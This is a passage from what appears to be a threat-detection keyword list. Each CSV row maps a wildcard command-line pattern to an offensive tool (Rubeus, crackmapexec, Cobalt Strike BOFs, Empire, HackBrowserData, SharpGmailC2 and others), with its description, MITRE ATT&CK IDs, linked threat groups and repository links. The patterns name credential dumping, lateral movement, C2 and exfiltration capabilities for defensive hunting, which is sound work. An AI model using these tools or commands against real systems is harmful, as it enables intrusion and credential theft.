T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* get collection-members -n USERS*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* get primary-users -u *,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* get site-push-settings*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* get_keystrokes*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* get_netdomaincontroller*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* get_netrdpsession*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* get_rooot *,offensive_tool_keyword,POC,Exploit for CVE-2022-27666,T1550 - T1555 - T1212 - T1558,TA0005,N/A,N/A,Exploitation tools,https://github.com/plummm/CVE-2022-27666,1,0,N/A,N/A,3,203,41,2022-03-28T18:21:00Z,2022-03-23T22:54:28Z -* get_timedscreenshot*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* GetAppLockerPolicies*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,0,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -* GetLsassPid*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,0,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -* getprivs.c *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* getprivs.o *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* Get-SpoolStatus.ps1*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -* --get-syscallstub *,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,0,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -* -GHUser * -GHRepo *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-ExfilDataToGitHub.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* giop-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* github repos list --org*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -* github repos list --user *,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -* give-dcsync*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -* give-genericall * -target-sid *,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -* gkrellm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* gmailC2.exe*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -* --gmsa-decrypt-lsa *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* go build -o padre .*,offensive_tool_keyword,padre,padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption,T1203 - T1059.003 - T1027.002,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/glebarez/padre,1,0,N/A,8,2,178,19,2023-09-25T19:11:44Z,2019-12-30T13:52:03Z -* golden * /badpwdcount*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* golden * /ldap *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* golden * /user:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* gopher-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* gophish-*.zip*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,0,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -* 'GPODDITY$' *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* --gpo-id * --domain * --command *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* --gpo-id * --gpo-type * --no-smb-server *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* --GPOName * --FilterEnabled --TargetDnsName *,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -* gpp_autologin*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* gpp_password*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* gpsd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* GreatSCT/*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -* --greeting * --personalize *--securelink*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,0,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -* -grouper2 -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -H * -u * -p * -r *C$/Users*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -* -h *-p * -c cypher.bin -k key.bin*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,0,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -* hack.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* HackBrowserData,offensive_tool_keyword,HackBrowserData,Decrypt passwords/cookies/history/bookmarks from the browser,T1555 - T1189 - T1217 - T1185,TA0002 - TA0009 - TA0001 - TA0010,N/A,N/A,Exploitation tools,https://github.com/moonD4rk/HackBrowserData,1,0,N/A,N/A,10,8729,1373,2023-10-02T14:38:41Z,2020-06-18T03:24:31Z -* HackBrowserData*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,0,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -* hackergu *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hadoop-datanode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hadoop-jobtracker-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hadoop-namenode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hadoop-secondary-namenode-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* hadoop-tasktracker-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Hak5.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -* harvest * 